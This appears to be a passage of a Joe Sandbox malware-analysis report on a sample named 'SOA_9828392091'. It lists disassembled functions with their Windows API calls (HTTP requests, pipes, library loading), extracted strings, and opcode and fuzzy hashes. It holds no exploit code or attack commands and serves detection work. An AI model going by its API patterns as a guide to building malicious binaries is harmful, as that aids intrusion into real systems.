                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw__swprintfstd::exception::exception
                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                      • API String ID: 2125237772-557222456
                                      • Opcode ID: 2f483ce410b717342495ced68171c80fa5aee4b426bf24a0a351fa9cb4021cd9
                                      • Instruction ID: 9b46f5511a521a0d72f669911d5b5fb83a8daa7bbe7225c2ef6d57504adca24f
                                      • Opcode Fuzzy Hash: 2f483ce410b717342495ced68171c80fa5aee4b426bf24a0a351fa9cb4021cd9
                                      • Instruction Fuzzy Hash: 68912DB15082019FC724EF24C895E6EB7E8AFD5700F04491DF9969B2A1DB71ED44CF92
                                      Function 0098AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0098B006
                                      • CharUpperBuffW.USER32(?,?), ref: 0098B115
                                      • VariantClear.OLEAUT32(?), ref: 0098B298
                                        • Part of subcall function 00979DC5: VariantInit.OLEAUT32(00000000), ref: 00979E05
                                        • Part of subcall function 00979DC5: VariantCopy.OLEAUT32(?,?), ref: 00979E0E
                                        • Part of subcall function 00979DC5: VariantClear.OLEAUT32(?), ref: 00979E1A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                      • API String ID: 4237274167-1221869570
                                      • Opcode ID: a1f5b359df2a32ad188a11d5601f11fff6d31cfac21c884f5b8132dad02fea39
                                      • Instruction ID: 1e0d32be5cf4300c19a03acaa463f5bcabdff28c07bc595e624cd062dc309417
                                      • Opcode Fuzzy Hash: a1f5b359df2a32ad188a11d5601f11fff6d31cfac21c884f5b8132dad02fea39
                                      • Instruction Fuzzy Hash: A4915D716083019FCB10EF24C495A5AB7F4EFC9704F08496DF89A9B3A1DB31E945CB52
                                      Function 00975347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094C6F4: _wcscpy.LIBCMT ref: 0094C717
                                      • _memset.LIBCMT ref: 00975438
                                      • GetMenuItemInfoW.USER32(?), ref: 00975467
                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00975513
                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0097553D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                      • String ID: 0
                                      • API String ID: 4152858687-4108050209
                                      • Opcode ID: 670b8906467b235db96f995eb460ca32bef8cef209c7852ce907d57bf08c16a2
                                      • Instruction ID: d5da73beb4c79222ebbae7595611e707742f94e1e33e5c49401cafa9edbe4445
                                      • Opcode Fuzzy Hash: 670b8906467b235db96f995eb460ca32bef8cef209c7852ce907d57bf08c16a2
                                      • Instruction Fuzzy Hash: E05104735187019BD794DB28C84577BB7E9AB85350F058A29F89DD31E0DBE0CD448B92
                                      Function 00970213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 0097027B
                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009702B1
                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009702C2
                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00970344
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                      • String ID: DllGetClassObject
                                      • API String ID: 753597075-1075368562
                                      • Opcode ID: 822df2e5a15cf8d1af7104cd54a993d4e6e04c19f03b3fd718733492cbbfe643
                                      • Instruction ID: eb367b126e4a341816390ebc5b3a06b9162063fc1ab9189ead1037241544542b
                                      • Opcode Fuzzy Hash: 822df2e5a15cf8d1af7104cd54a993d4e6e04c19f03b3fd718733492cbbfe643
                                      • Instruction Fuzzy Hash: 97416D72605204EFDB05CF64C885BAA7BB9EF84314B14C0A9E90D9F206E7B5D944CBA0
                                      Function 00975007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00975075
                                      • GetMenuItemInfoW.USER32 ref: 00975091
                                      • DeleteMenu.USER32(00000004,00000007,00000000), ref: 009750D7
                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009F1708,00000000), ref: 00975120
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$InfoItem_memset
                                      • String ID: 0
                                      • API String ID: 1173514356-4108050209
                                      • Opcode ID: 856a2f928124812a45198a43df6fd392e4b314b31bc0340013fed9706dcd990c
                                      • Instruction ID: a0869f57136fbca62880604825a0f27f84aee224f1cbc7be6671ee7530e7b205
                                      • Opcode Fuzzy Hash: 856a2f928124812a45198a43df6fd392e4b314b31bc0340013fed9706dcd990c
                                      • Instruction Fuzzy Hash: 1D41D4322097019FD720DF24D885B6AB7E8AF85325F058A1EF95D97291D7B0EC00CB62
                                      Function 0097E698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0097E742
                                      • GetLastError.KERNEL32(?,00000000), ref: 0097E768
                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0097E78D
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0097E7B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                      • String ID: p1#v`K$v
                                      • API String ID: 3321077145-1068180069
                                      • Opcode ID: a2c415e5aa95790b38f8f44a7d769f0ab559d012b38bd64c0628a74ff08b0e54
                                      • Instruction ID: 0513f3ccb9aaf7e943434c36f47f9aa1160dc711ae8f41c12283281b2eb9c77f
                                      • Opcode Fuzzy Hash: a2c415e5aa95790b38f8f44a7d769f0ab559d012b38bd64c0628a74ff08b0e54
                                      • Instruction Fuzzy Hash: C641123A600610DFCB15EF15C585A4DBBE5BF99720F198498E94AAB3A2CB74FD00CB91
                                      Function 00990567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerBuffW.USER32(?,?,?,?), ref: 00990587
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BuffCharLower
                                      • String ID: cdecl$none$stdcall$winapi
                                      • API String ID: 2358735015-567219261
                                      • Opcode ID: 33708f3d3eccf719cec1091aeee3142964756e0dc831d77cf052434ae7332d65
                                      • Instruction ID: 837b30e69ae89e32157b1da93f7439bcc4e29e8b48660e5daa0dff402afd6a03
                                      • Opcode Fuzzy Hash: 33708f3d3eccf719cec1091aeee3142964756e0dc831d77cf052434ae7332d65
                                      • Instruction Fuzzy Hash: CB31A170600616AFCF10EF58C981AEEB3B8FF95314B108A29E876A72D1DB71A915CF50
                                      Function 0096B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0096B88E
                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0096B8A1
                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 0096B8D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 3850602802-1403004172
                                      • Opcode ID: 34a8a652fe625c34bce116159e15681407e4e21bf0d8d9bc82a361f5481847a1
                                      • Instruction ID: 69e8573c59bf6cf6b4d6250027f2f23a79898de78409abf87dd21b20e1c95c4f
                                      • Opcode Fuzzy Hash: 34a8a652fe625c34bce116159e15681407e4e21bf0d8d9bc82a361f5481847a1
                                      • Instruction Fuzzy Hash: 372105B1A00108BFDB14AB64C886EFE777CDF85354F104129F422E31E0EB744D469B60
                                      Function 009351AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0093522F
                                      • _wcscpy.LIBCMT ref: 00935283
                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00935293
                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009A3CB0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                      • String ID: Line:
                                      • API String ID: 1053898822-1585850449
                                      • Opcode ID: e0c63d78ee491dfaa3b5be1e5227dec30dca9e9d792e58bef65c8d9e34735721
                                      • Instruction ID: fac355ce903b6794e4cd4937a189a846440961b3e97d195661f887f873373813
                                      • Opcode Fuzzy Hash: e0c63d78ee491dfaa3b5be1e5227dec30dca9e9d792e58bef65c8d9e34735721
                                      • Instruction Fuzzy Hash: 3331AD7150C740AFD321EBA0DC46FEF77E8AB88314F00891AF59992091EB70A648CFD6
                                      Function 009843E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00984401
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00984427
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00984457
                                      • InternetCloseHandle.WININET(00000000), ref: 0098449E
                                        • Part of subcall function 00985052: GetLastError.KERNEL32(?,?,009843CC,00000000,00000000,00000001), ref: 00985067
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                      • String ID:
                                      • API String ID: 1951874230-3916222277
                                      • Opcode ID: a7c2962b2c614982833b296aa266218a4336df72d539a585b7254550f7c245ff
                                      • Instruction ID: a60a2a9701555ba4ad25174e54b5b9cfc1960d568beb0b2134029b88d600a2f5
                                      • Opcode Fuzzy Hash: a7c2962b2c614982833b296aa266218a4336df72d539a585b7254550f7c245ff
                                      • Instruction Fuzzy Hash: FA21C2B1500209BFEB11AF64CCC4FBFBAECEF88758F10851AF109E2250EA648D059771
                                      Function 009990E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0094D1BA
                                        • Part of subcall function 0094D17C: GetStockObject.GDI32(00000011), ref: 0094D1CE
                                        • Part of subcall function 0094D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0094D1D8
                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0099915C
                                      • LoadLibraryW.KERNEL32(?), ref: 00999163
                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00999178
                                      • DestroyWindow.USER32(?), ref: 00999180
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                      • String ID: SysAnimate32
                                      • API String ID: 4146253029-1011021900
                                      • Opcode ID: 4ab514d128dfba11de6df5101bcedd4eb2a68822fd714cf76810aa6c21536709
                                      • Instruction ID: 91ff46736800e81184d262bd27539edf3e8eceaf66c565175359ee23c9783a91
                                      • Opcode Fuzzy Hash: 4ab514d128dfba11de6df5101bcedd4eb2a68822fd714cf76810aa6c21536709
                                      • Instruction Fuzzy Hash: 58218B71218206BBEF204E6D9C89FBA37ADFB9A368F10061DF91492190D732DC51A760
                                      Function 00979568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(0000000C), ref: 00979588
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009795B9
                                      • GetStdHandle.KERNEL32(0000000C), ref: 009795CB
                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00979605
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      • Opcode ID: 3358839f4c02029e6633d95b6986478cbe7eaa8d46c2fb7e60c44b44f6c061f9
                                      • Instruction ID: aa7ad50f372790b1e4b1c7dc96496824ad5f527c9731c7ac6d201c4c21ecf6e7
                                      • Opcode Fuzzy Hash: 3358839f4c02029e6633d95b6986478cbe7eaa8d46c2fb7e60c44b44f6c061f9
                                      • Instruction Fuzzy Hash: F6215172600216ABDB219F29DC45A9A7BA8EF85724F208A19FDA9D72D0D770D940DB10
                                      Function 00979634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00979653
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00979683
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00979694
                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009796CE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      • Opcode ID: 16fc6246eb3665f62470612c76bddc87f5992647141dc68d64dc50ba66d0388c
                                      • Instruction ID: 7d6827645aeb3e61eff86fd4fbef36139a636d15a088a1afaa8e0415356cd94a
                                      • Opcode Fuzzy Hash: 16fc6246eb3665f62470612c76bddc87f5992647141dc68d64dc50ba66d0388c
                                      • Instruction Fuzzy Hash: 2A214F72600206ABDB209F699C45E9A77ECEF95734F208B19F9A5E72D0E7709841CB50
                                      Function 0097DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0097DB0A
                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0097DB5E
                                      • __swprintf.LIBCMT ref: 0097DB77
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,009CDC00), ref: 0097DBB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume__swprintf
                                      • String ID: %lu
                                      • API String ID: 3164766367-685833217
                                      • Opcode ID: da08d6ccf7c2fba148e5c499bb429c3d74d420cd485ba8b3e7da08c0f2f90f81
                                      • Instruction ID: fdc41cb609847e51f0402e9a3539503efce7b56b7072f8d72225a0d44a8a66f7
                                      • Opcode Fuzzy Hash: da08d6ccf7c2fba148e5c499bb429c3d74d420cd485ba8b3e7da08c0f2f90f81
                                      • Instruction Fuzzy Hash: A0218375A00108AFCB10EF65C985EAEB7B8EF88714F104069F909E7251DB70EA01DF61
                                      Function 0096C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0096C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0096C84A
                                        • Part of subcall function 0096C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0096C85D
                                        • Part of subcall function 0096C82D: GetCurrentThreadId.KERNEL32 ref: 0096C864
                                        • Part of subcall function 0096C82D: AttachThreadInput.USER32(00000000), ref: 0096C86B
                                      • GetFocus.USER32 ref: 0096CA05
                                        • Part of subcall function 0096C876: GetParent.USER32(?), ref: 0096C884
                                      • GetClassNameW.USER32(?,?,00000100), ref: 0096CA4E
                                      • EnumChildWindows.USER32(?,0096CAC4), ref: 0096CA76
                                      • __swprintf.LIBCMT ref: 0096CA90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
